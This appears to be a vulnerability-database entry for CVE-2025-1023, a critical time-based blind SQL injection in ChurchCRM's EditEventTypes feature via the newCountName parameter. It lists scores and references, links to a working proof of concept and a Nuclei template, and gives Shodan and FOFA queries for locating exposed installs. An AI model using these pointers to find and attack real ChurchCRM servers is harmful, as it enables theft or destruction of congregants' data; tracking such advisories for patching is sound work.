CVE-2025-1023

CRITICAL EXPLOITED NUCLEI

ChurchCRM <5.13.0 - SQL Injection

Title source: llm

Description

A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Exploits (1)

github WORKING POC 4 stars

by halilkirazkaya · poc

https://github.com/halilkirazkaya/cve-poc-garage/tree/main/2025/CVE-2025-1023.md

View Code ZIP pw:eip

Nuclei Templates (1)

ChurchCRM - SQL Injection

CRITICALVERIFIEDby Kazgangap

Shodan: http.title:"churchcrm"

FOFA: app="churchcrm"

References (1)

[Exploit, Issue Tracking, Third Party Advisory] https://github.com/ChurchCRM/CRM/issues/7246

Scores

CVSS v3 9.8

EPSS 0.0275

EPSS Percentile 86.0%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

VulnCheck KEV 2026-02-01

CWE

CWE-89

Status published

Products (1)

churchcrm/churchcrm < 5.13.0

Published Feb 18, 2025

Tracked Since Feb 18, 2026